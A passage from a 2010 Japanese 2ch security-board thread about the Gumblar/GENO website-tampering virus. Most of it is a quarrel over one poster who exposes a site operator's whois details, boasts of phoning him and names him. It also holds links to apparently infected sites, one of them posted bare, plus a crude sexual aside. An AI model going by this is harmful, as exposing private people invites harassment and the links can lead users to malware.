658 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:54:13 ]: モロに個人情報じゃねーか
whoisで調べれば出るとはいえ
659 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:54:45 ]: 公開されている番号だな
660 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:55:39 ]: >>651
馬鹿？
お前ネット初心者？
さっさと削除依頼だしてこい
661 名前：657 mailto:sage [2010/02/16(火) 19:56:06 ]: >>651
それ・・・完全に特定可能だぞ人物を

つかどーするよ・・・アバスト先生がトロイを見つけたって騒いでその中に接続を遮断ってのがあったから即押したが・・・

苦し紛れにスパイボットとウィルスバスターとアバストでPC内総点検するか・・・
662 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 19:59:55 ]: 諦めて再インストールしようぜ
663 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:01:59 ]: ああ、個人情報か
664 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:07:21 ]: 個人情報晒しは殺人予告並に悪質ととられる
通報される前に削除以来を出しておけ
665 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:10:07 ]: 一般人のwhois晒すとか頭大丈夫か？ｗ
666 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:10:11 ]: //ad4u●jp/ml-arena/

朝、avastが反応した
667 名前：657 mailto:sage [2010/02/16(火) 20:10:58 ]: >>662
再インストールなんて眼中にない

アバストはJS:Illredir-I [Trj]が某アドレスから検出されたって警告を出したみたい

これはガンブラー系亜種確定・・・?ご愁傷さまですか?

ちなみにバスターは無反応。今まではバスター入れてりゃ安心だって思ってたが以外と違うのかもしれん・・・・
(((((´；ω；)))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
668 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:13:51 ]: 削除依頼しておいたよ
669 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:14:22 ]: ついに逮捕者が･･･
670 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:14:56 ]: 慌てずに>>4,6確認してみたら？
671 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:20:11 ]: >>668
余計なお世話です。

whois情報は誰でも確認できる後悔情報です。

ウイルスをばら撒き改善もせず、可笑しな主張をする方が一般人とは笑わせるんじゃありませんよ。
672 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:21:29 ]: バスターってVeryBakaだろ…
673 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:21:44 ]: >>667
所詮アンチウィルスなんてどれも後手後手の対応だからな
どんないいアンチウィルスでも予防注射程度に考えた方がいい
674 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:21:51 ]: その理屈が取り締まり側に通用すればいいがな
悪気はなかった、しらなかったですまないのが最近のネット界
675 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:22:01 ]: ｱｸ禁になった人の為にﾚｽ代行するｽﾚ★183
yutori7.2ch.net/test/read.cgi/accuse/1266067772/996

ここか
676 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:22:02 ]: >>667
どのセキュリティ対策ソフトでも
それだけ入れてりゃ大丈夫なんてものはない
677 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:24:01 ]: マジで再インストールした方がいい
それでもやらないなら後は好きにしろ、俺は知らん
678 名前：651 mailto:sage [2010/02/16(火) 20:26:46 ]: ガンブラーに感染していると知らたにも係わらず
非礼な対応をし、HPを削除すればいいんだろみたいな方は
容赦しません。
679 名前：657 mailto:sage [2010/02/16(火) 20:27:56 ]: >>670
ありがとう。
>>4 >>6確認したところ異常は無かった。

とりあえずアバストの検索終了待ち・・・・
680 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:28:48 ]: で、晒した貴方が訴えられる可能性がありますがね
その発言で故意という事が分かったし予告inやそれ系の外部の偽善サイトでターゲットにされても不思議じゃない
681 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 20:29:03 ]: >>678
個人情報ばらまき乙
通報しました
682 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:29:42 ]: whoisで見えるから晒してもOK？馬鹿かこいつｗ
683 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:30:57 ]: >>678
だいたい面倒なことになるし本人に直接いうのだるくね？
上を叩いた方が楽だと何度言えば
684 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:31:11 ]: タウンページに載ってるのを晒してるのと一緒
あほすぎ
685 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:32:34 ]: >>679
>>4,6が最新のものも同じである保障はないんで気休めにもならないよ
Avastが検出しきれるかも不明
686 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:32:36 ]: >>678
代行使ってレスしてるのか？
687 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 20:33:35 ]: 誰でも自由に閲覧できる
しかし、晒して良い情報ではない
688 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:34:48 ]: どうなんだろうね
info.2ch.net/guide/adv.html
電話番号
電話番号は、一部伏字・それを示唆するような文字列・等でも、確認方法が
確立していない為に原則として全て削除対象です。
明らかに公的な物・投稿者がハンドルキャップ使用・文意によって
本人が公開したと判断できるもの・リンク先で確認できるもの・等は、
自己責任として削除されないことがあります。
689 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:36:10 ]: >>680-682
上等です

今忙しいと電話を切る方がおかしいわww
690 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:36:22 ]: 面白いから通報というか某所に連絡しておいた
しかし、およそセキュリティ板とは思えない輩だな
ISPは登録者の個人情報を守る義務があるがそれは建前で悪い事をすれば普通に
開示するのでたかが2chのレスと侮るなかれ
このスレは特にまともな部類だと思っていたんだが
691 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:39:18 ]: そもそもセキュ板自体IDねえしなｗまあIDなんて参考程度にしかならんが
692 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:39:59 ]: >>651
これを代行したのだけど申し訳ないです。
いつもここを見ていたので何時もの連絡だと思って
詳細を確認せずに代行してしまいました。
すみませんでした。
693 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 20:40:15 ]: whoisの情報なら公開しても良い?
何考えてんだwww

出直してこい
694 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:40:19 ]: 一般的な荒し（プロバイダ規制の温床）→実家に電話&AA含む2chのログを印刷して実家に送りつけてくる
個人情報晒し/殺人予告/爆破予告など支障をきたすもの→明確で悪質ととられた場合、逮捕も
695 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:40:26 ]: 通報したい奴は>>675のリモホを通報すればいいんじゃないかな。
とりあえず転載

996　 [´・ω・｀] EM114-48-20-216.pool.e-mobile.ne.jp　[]　　2010/02/16(火) 19:42:09 ID:lkIlsWkc

【依頼に関してのコメントなど】よろしくおねがいします
---------------------------------------------------------------------------
【*板名】セキュリティ
【*スレ名】【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
【*スレのURL】pc11.2ch.net/test/read.cgi/sec/1265387369/
【名前欄】
【メール欄】sage
【*本文：この下にコピペして欲しい文を入れて下さい。以下を本文としてコピペします】
>>648
凸完了
閉鎖して二度とnetに係わらないらしい
この人変w

（以下略）
696 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:41:43 ]: >>690
悪いことじゃないでしょう
697 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:43:02 ]: >>693
公開情報を公開して何の問題があるの？
698 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:44:14 ]: 晒し君、火消し必死すなぁ
頭の中にウィルス感染したんじゃないの？
699 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 20:44:15 ]: >>696
ならお前の氏名,住所,電話番号を掲載しろよ
700 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:45:15 ]: >>697
馬鹿？
じゃあ明日公開されている個人情報をTシャツにプリントして歩き回れ
証拠もよろしくね
701 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:45:15 ]: >>699
公開情報じゃないので
702 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:46:25 ]: >>701
というか書けるなら代行使う必要無いよね
703 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:47:06 ]: >>700
意味が分からないw
704 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:47:22 ]: 2件の外部サイトに連絡完了
705 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:47:31 ]: >>703
馬鹿？
706 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 20:48:02 ]: 晒し厨乙
707 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:48:14 ]: >>698
火消しって意味分かる？
むしろそれは晒したお前の方じゃん
708 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:48:21 ]: 日本語読めないのかな？
info.2ch.net/guide/adv.html
709 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:49:45 ]: 晒してる奴もウィルスと一緒だな
710 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:50:04 ]: >>695
e-mobile規制されてるのか　何故だろう
711 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 20:50:52 ]: まぁ、通報する奴は適当なとこに通報して
晒した奴はガクブルしてればいいんじゃね？
712 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:51:44 ]: 公開情報であろうともなかろうと、2chでは電話番号は削除対象だった希ガス
713 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:51:47 ]: 言い訳ﾜﾛﾀ
714 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:52:48 ]: >>712
その通り
個人名だけなら削除対象外
715 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:52:55 ]: いつもの連絡だと思って代行してしまってすみませんでした。

昨夜殆ど寝て居ないので少し仮眠とりますが、また来ます。
この度は申し訳ありませんでした。
716 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:52:59 ]: スレ伸びてるな。
717 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:53:19 ]: 人間て面白っ
718 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:53:39 ]: >>712
電話番号載ってますな
719 名前：651 mailto:sage [2010/02/16(火) 20:53:59 ]: とりあえず、私が悪いと主張したいなら訴えれば？

私に非がない場合は、覚悟してねw
720 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:54:27 ]: (ｷﾘｯ
721 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:54:36 ]: 覚悟も何もルール違反に抵触しているから既に複数の外部に通達済
722 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:55:10 ]: >>708
アウトー
723 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:55:16 ]: トリつけてよｗ
それでまた今度書き込みにきてよ
724 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:56:02 ]: 公開情報だけど2chでは載せるの駄目なんでしょ。
なんでここまで荒れてるの・・・
725 名前：657 mailto:sage [2010/02/16(火) 20:56:13 ]: 主に俺が感染サイト踏んだって騒いだのが原因orz
726 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:56:17 ]: どう考えてもアウトだしトリとかつけれるわけ無いでしょ
727 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:56:21 ]: セキュ板でこんなに笑う日がくるとは思わなかった
728 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:56:52 ]: 公開されてる電話番号は削除対象外です。
729 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:58:27 ]: >>708
「自己責任」　として削除されないことがあります。

まぁ何かあれば責任とるんじゃないの？
>>651がｗ
730 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 20:59:16 ]: >>725
>>2の対策はしてなかったのかい
731 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 21:01:26 ]: 個人情報晒し乙
732 名前：657 mailto:sage [2010/02/16(火) 21:01:51 ]: >>730
PCの対策はしておいたけど心の対策なんてしてなかったから一瞬でテンパってしまったんよ・・・

飯だしこれでﾉ
733 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:04:30 ]: 　　　　　ﾄ､　　　　　　　　　　　　　　　　　　______）
　　　　「::::＼┐　 _,,.　--──- ､..,,_　　　　｀ヽ.　で　泣　　も　　　
　　 r-‐'へ::::::::!_'´　__,,,,......,,,,,__　　　｀ヽ､　　　　',　す　い　　う　　
　　＞:､:;::::::＞''"´　　　　　　　｀"'' ､　　　':,　　　i. よ　て　や　　
　　└─ｧ''"　 /　　　　　　　　　　　｀':.,　　',.　　 !！　る　　め　　
　　　 ,:' / 　 / ,' /　 ,' i.　 ',　':,　　i 　　 ',! 　i.　　|.　　子　て　
　　　/　,' 　.,'`メ､!,_,/ ./!　､i__,,!イ .|.　 i　,ゝ　|　　|.　　も　　.下　　
　　 ,'　 i 　 ,!/,.-ｧｰ;' /　!/ｧ;ｰ'-r'､ !　/__」　　| 　 | 　　い　　さ　　
　　 i 　 !　ﾊ!ｲ　i `ﾊ　　　 i　`'ﾊ　Y/ i/ 　;　|　　|.　　　る　い
　　└'^iー! ,iﾍ　':,_ﾝ　　　　':,__ンノ!' 　|　 i.　i　 ,' 　　　ん　　 ! !
　　　 ,:' 　.!.7,.,., 　　　'　　　　 .,.,., ,'! 　.!　 |　|∠,_　　　　________
　o ゜/ 　,:'. ﾄ､　　 r‐,-‐ ''"´｀ヽ.　/ ; 　 |　 !　!　　｀Y´￣
　　 ,' .／/　i. ｀i:.､.,!/　　　　,.ｲ,:'　,' 　 |　,'i .|
　　ﾚﾍ_/ヽ. !ｧ''"´ ｀ヾi､ｰ=''"/ﾖ___,/､___!へr┘
　　　　　　 / 　　　　　ヾ!二へ/:::::ﾄ,.-'‐'^ヽ,
　　　　　 ,'　　　　　　　',l＞く}:::７　　　 rﾉ　　　,. '"´￣｀ヽ.　　っ
　　　　　K_ 　　　_,r-イYﾝ/ﾑi:::::/　　 ,ノ´　　／　　>>651 　',　っ
　　　　 /Y＞ﾍﾞ´　　'';:::::io:／　　 ,ｲ　　　/　　　　　　　 !
　　　 ,.:':::::ヽ､ン':,　　　ヽ／　　　,ｲ /ﾞ,ｰ､,'　　　､　　 ,.-‐､,'
　　／:::/:::::::::::::::::ヽ.　　'　　　,.;'ヾ/､/_/ﾉ　　ヽ. ヽ,／,.-‐'/
　,く:::::::/::::::::::::::::::::::::`ヽ､___,.,.イi `'ｰ'^''‐'/ 　　　ヽ.,／ (___)
'´::ヽ｀'::､::::::::::::::::::::::::::::::::/!::::::::::!　　　　,'　　　　　　 ,.:'"´
::::::::/｀7::::｀''r-::､:;_______/ｒL_,.イヽ.　　　i　　　_,. -‐''"´｀ヽ　　/
::::::;'::::::!::::::::::';:::::::::::＼:::::::::::::::::!:::::::':, 　ヽ､　　　　　　　ノ　ノi
734 名前：651 mailto:sage [2010/02/16(火) 21:04:31 ]: 「stylen.net」のAokiさんはnetには係わらないで下さい。
ご自分でおしゃったのですからね。
735 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:05:42 ]: >>734
でっ何がしたいの？
ｱｸ禁になった人の為にﾚｽ代行するｽﾚ★183
yutori7.2ch.net/test/read.cgi/accuse/1266067772/996
736 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 21:07:17 ]: モラル低過ぎ
セキュリティ板はこの程度なのか？
737 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:07:33 ]: うんw
738 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:07:50 ]: 1件追加で計3件のサイトに連絡完了
自分はこれで満足したのでこれで退散
>>651(笑)も程々にね
739 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:07:55 ]: 　　　　　ﾄ､　　　　　　　　　　　　　　　　　　______）
　　　　「::::＼┐　 _,,.　--──- ､..,,_　　　　｀ヽ.　で　泣　　も
　　 r-‐'へ::::::::!_'´　__,,,,......,,,,,__　　　｀ヽ､　　　　',　す　い　　う
　　＞ :､:;::::::＞''"´　　　　　　　｀"'' ､　　　':,　　　i. よ　て　や
　　└─ｧ''"　 /　　　　　　　　　　　｀':.,　　',.　　 !！　る　　め
　　　 ,:' / 　 / ,' /　 ,' i.　 ',　':,　　i 　　 ',! 　i.　　|.　　子　て
　　　/　,' 　.,'`メ､!,_,/ ./!　､i__,,!イ .|.　 i　,ゝ　|　　|.　　も　　.下
　　 ,'　 i 　 ,!/,.-ｧｰ;' /　!/ｧ;ｰ'-r'､ !　/__」　　| 　 | 　　い　　さ
　　 i 　 !　ﾊ!ｲ　i `ﾊ　　　 i　`'ﾊ　Y/ i/ 　;　|　　|.　　　る　い
　　└'^iー! ,iﾍ　':,_ﾝ　　　　':,__ンノ!' 　|　 i.　i　 ,' 　　　ん　　 ! !
　　　 ,:' 　.!.7,.,., 　　　'　　　　 .,.,., ,'! 　.!　 |　|∠,_　　　　________
　o ゜/ 　,:'. ﾄ､　　 r‐,-‐ ''"´｀ヽ.　/ ; 　 |　 !　!　　｀Y´￣
　　 ,' .／/　i. ｀i:.､.,!/　　　　,.ｲ,:'　,' 　 |　,'i .|
　　ﾚﾍ_/ヽ. !ｧ''"´ ｀ヾi､ｰ=''"/ﾖ___,/､___!へr三/)　　　　　　　(ヽ三/)　））
　　　　　　 / 　　　　　ヾ!二へ/:::::ﾄ,.-'‐'^ヽ(((i )　　＿＿＿　　　( i)))
　　　　　 ,'　　　　　　　',l＞く}:::７　　　 rﾉ／　　／　　　　＼　　ヽ＼
　　　　　K_ 　　　_,r-イYﾝ/ﾑi:::::/　　 ,ノ´く　　／　(●)　(●)　＼　　>　）
　　　　 /Y＞ﾍﾞ´　　'';:::::io:／　　 ,ｲ＼　｀／::::::⌒（__人__）⌒:::::＼'　/
　　　 ,.:':::::ヽ､ン':,　　　ヽ／　　　,ｲ /ﾞ,ｰ､ |　　　　　　￣　　　　　|/
　　／:::/:::::::::::::::::ヽ.　　'　　　,.;'ヾ/､/_/ﾉ＼　　　　　　　　／
　,く:::::::/::::::::::::::::::::::::`ヽ､___,.,.イi `'ｰ'^''‐'/ 　　＼　　　　　　　:::::/
740 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:09:03 ]: ID出れば多少はマシになるんだろうが…
741 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:11:58 ]: P2で自演するの楽しい
742 名前：名無しさん＠お腹いっぱい。 [2010/02/16(火) 21:12:58 ]: >>741
それは俺だけの特権
743 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:17:16 ]: これでも去年の腐れ女子騒動の時よりはマシだという
744 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:19:02 ]: >>743
kwsk
745 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:26:52 ]: 他のスレから拝借したのを改造したけどこれでいけるか？

このスレのリンクを無効化するReplaceStr
<rx>[TAB]h?t?tps?://()[TAB]<font color="red">【リンク無効化】</font>　 $1[TAB]msg[TAB]<0>【Gumblar/GENO】Web改竄ウイルス総合スレ
746 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:27:17 ]: www.midori-gourmet●com/mise/267_goose/index●html
なんか怪しいリンクが貼られてたんですけど・・・チェッカーやaguse
じゃ反応なかったんですけど、どうですか？
747 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:31:38 ]: 点はもう一個あるぞ
748 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:32:40 ]: ごめん、気がつかなかった。反省です。
749 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:35:16 ]: >>725
全然関係ないよ
自意識過剰にもほどがある
だまってOSいれなおせ
750 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:36:42 ]: >>746
ここは鑑定スレではございません
751 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:43:12 ]: >>746
宣伝なら他でやってくれｗ
752 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:47:30 ]: 今のFlashの最新バージョンって10,0,45,2でいいんかな？
Adobeの最新版のリストが10.0.42.34ってなってるんだけど。
753 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:51:06 ]: 12日に来たばっかりだしそれが最新だろ
754 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:54:04 ]: 不正アクセスしてくるIPを晒すスレPart12
↑
こんなんとかいいのか？
本当に不正アクセスがあったのかわからんのに
Whoisの情報バンバン張りつけてるぞ！
755 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:55:30 ]: 今更自己弁護とかいいから
正しいと思ってやったんなら同類を探すこと無いだろ
756 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 21:57:39 ]: >>752
このページに行かないんだよね　ttp://www.adobe.com/jp/software/flash/about/
757 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:13:18 ]: >>752
1回ブラウザ閉じた？
758 名前：757 mailto:sage [2010/02/16(火) 22:14:08 ]: 間違えた、リストに最新版が無いって話か
759 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:16:40 ]: >>752
最新版がインストールされない不具合ってもの聞いたけど・・・
その場合は一度アンインストールしないと駄目らしい。
760 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:20:11 ]: >>752
10,0,45,2で問題ない
761 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:23:37 ]: >>756
自分は、表示されるヴァージョンが前のなってるけど
プログラムの追加と削除からプロパティでみると最新なんだよね・・・
インストールやり直したほうがいいかな？
762 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:34:31 ]: まさしく dll hell だな。
マニュアルでdllをコピーとかしていたんじゃねーの
763 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:44:25 ]: どうしたらいいの・・・・
764 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 22:53:43 ]: >>761
実際にブラウザで使用されてるバージョンが重要
ブラウザを全部閉じて、PCを再起動したあと
インストールしてるすべてのブラウザで確認する
www.adobe.com/jp/software/flash/about/
更新がうまくいかないなら、adobeからアンインストーラをダウンロードして
ブラウザをすべて閉じた後で実行する
PCを再起動してインストールしなおす
765 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:04:51 ]: 分かりました。試してみます。ＩＥは、なぜかバージョンが表示されない・・・
766 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:05:41 ]: なんかスレが伸びてると思ったら…

公開情報の何がいけないのか教えてはくれまいか？マジで。
767 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:08:26 ]: >>発掘屋たん
www●midori-gourmet●com/mise/316_tresette
これは別に何もなくね？
768 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:15:18 ]: >>766
まずはスレチ
769 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:30:05 ]: >>766
Gumblarに感染してここに来た新参が同病相哀れむ的に火病ってるだけ
770 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:30:35 ]: だんだんコードがながくなってきたんだね、
新しいコードは何がなんだかわからん。
771 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:36:12 ]: コードが高度になってきたな
772 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/16(火) 23:36:59 ]: しんぎきょひ
773 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:14:11 ]: >>771
去年の4～5月あたりから出て一年近くになるけど一向に落ち着く気配が無いような気がする
774 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:21:35 ]: >>771
・・・。（´・ω・｀）
775 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:34:26 ]: コードがこーどになってきたな…
776 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:34:35 ]: >>771
ワロタｗｗｗ
777 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:38:58 ]: >>771
(*´д｀*)ﾊｧﾊｧ
778 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:55:26 ]: このウイルス作って広めたやつ
普通に処刑されるだけじゃ済まされないだろうな
刑務所で半永久的に拷問を受けるとか
死んだ方がマシなレベルの罰と苦痛を与えられそうだ
779 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:58:01 ]: そんなふうにならんからはびこってるのに……
780 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:58:11 ]: >>778
アウトー！
781 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 00:59:15 ]: 一体何処の国ならそんなことになるんだｗ
782 名前：へたれ発掘屋 mailto:sage [2010/02/17(水) 01:07:33 ]: >>767
ttp://www.google.co.jp/search?as_q=&hl=ja&num=10&btnG=Google+%E6%A4%9C%E7%B4%A2&as_epq=&
as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=www.midori-gourmet.com&as_rights=&safe=images
「このサイトはコンピュータに損害を与える可能性があります。」
「このサイトはコンピュータに損害を与える可能性があります。」
「この(ry

mise/外すの忘れてたのはナイショ･･･orz

>>651はスルーしておく事にするw
783 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 01:20:08 ]: >>781
ロシアです♪
と言いたいところだが本当だ。
当時はピンサロ平塚ジャンジャンが有名で
ロシア人とのハーフである光月夜也のまんまんを
ペロンペロンに舐めまくっていた。
ボーッとしてると従業員に「お客さんちゃんと舐めてくださいよ」と
叱られた記憶もある。
花びら3回転だったしもちろん生尺。
近所の紅花という定食屋でサインを貰おうとした記憶がある。
784 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 01:22:37 ]: >>782
乙です。ガンブラー以外ってことかな？
785 名前：へたれ発掘屋 mailto:sage [2010/02/17(水) 02:09:37 ]: >>784
URLを投下した時は8080のコードがあったから
改竄→修正→再改竄･･･を繰り返してると思う(Google先生が激怒してるし)
786 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 02:31:08 ]: >>785
分かりました。先生激怒してるってどうやって見たらいいのかな？
787 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 02:52:52 ]: >>786
そこのページを含むドメインにGoogle検索から行けばいい。
「緑区料飲組合」で検索すればおk。

もしくはFirefoxとかのセーフブラウジングのデータを内蔵しているブラウザでアクセスしてもいい。
788 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 03:20:06 ]: >>767 >>786 >>787
通報してからクリーニングされるまで４日かかってるね～
（対応ってこんなもんか）
789 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 07:03:33 ]: news-enter.com/
790 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 07:50:30 ]: 直リンバーカ！
791 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 07:58:30 ]: ウィルス直リンは荒し区分に入り、通報対象
792 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 08:16:21 ]: Adobe Reader 9.3.1
Adobe Reader Plugin 9.3.0.148
793 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 08:30:26 ]: スクリプトに
2ch-net
が入ってるじゃん。

ニコ動といい、
このスレ見にきてるだろ。作った奴。
ほくそ笑んでんじゃんぇーぞ。
794 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 09:02:05 ]: そういや・・・法政の8080は除去されたけど消して何も無かった事にしてるような・・・まぁいいか
795 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 09:24:27 ]: www●tatsumi-elec●co●jp
796 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 09:35:15 ]: > 【２】猛威をふるう新ウイルス「ガンブラー」対策を無料で！
ってのがYahoo!プレミアム会員宛に来た。

これらしい
ttp://online.security.yahoo.co.jp/sagiwall/case1.html#spy

中身はこれらしい。

> セキュアブレインが、Gumblar（ガンブラー）ウイルス対策に有効な個人向けセキュリティソフト
> 「Internet SagiWall（インターネット・サギウォール）」を1,980円で提供開始

ttp://www.securebrain.co.jp/about/news/2010/01/isw1980.html

Firefoxは対応してないし、大丈夫なんだろうか。
